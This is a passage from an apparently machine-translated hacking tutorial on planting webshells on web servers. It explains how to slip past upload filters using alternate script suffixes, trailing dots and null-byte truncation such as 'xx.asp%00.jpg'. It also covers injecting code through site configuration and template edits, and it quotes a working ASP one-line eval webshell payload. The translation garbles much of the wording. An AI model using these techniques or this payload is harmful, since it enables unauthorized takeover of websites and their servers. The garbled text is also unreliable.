IV: Other types take Upload webshell (1) of this type for a single server having a plurality of sites, a site is asp station, b station site may be php. And a stop to limit the upload files asp file type, you can try to upload php script to come and collect shell
(2) You can also try the script file name suffix asa or add directly behind the [.] As xx.asp. To break the file type upload limit to get webshell. Summary: asp website is simply upload php.asa such as executable script, php asp upload the website (asp upload /1.php/.asa, etc.)
Five: Take webshell 00 00 truncate truncate vulnerability causes: the use of 00 cut-off filter is the use of a programmer is not strict path of the file to upload when writing a program to produce 0x00 upload truncation vulnerabilities. (Assuming that the file upload path [http: //xx.xx.xx.xx/upfiles/lubr.php.jpg], cut off the back of the packet capture by [lubr.php] into [0x00] at [.]. upload time, when the file system read the file would think that over time [0x00], which is written lubr.php.jpg] [content] to [lubr.php in, so as to achieve the purpose of attack vulnerabilities in what .0x00 when available,: packet must contain the case file after the upload directory before they can use specific measures: (1) when uploading files, you upload the file name may be automatically changed to another name website, this time you can try to grab a data packet to upload files, the file name to xx.asp% 00.jpg truncated upload get webshell. (2) 0x00 is the end identifier string, an attacker can use to manually add the string identifier way behind in terms of content will be cut off, and the contents of the back and can help us to bypass.
Six: the use of network configuration plug horses get webshell default configuration by finding sites that will sentence inserted into the website configuration. However, in order to successfully perform interpolation horse, first download the source code of the site, to view the source filter principle, to prevent the plug horses fail. Sentence: "%> <% eval request (" cracer ")%> <% '
Seven: edit the template to get webshell (1) sentence written by editing the template site, and then generate a script file to get webshell. (2) by adding the Trojans to the compressed file, type the name to a network template upload web server to get webshell.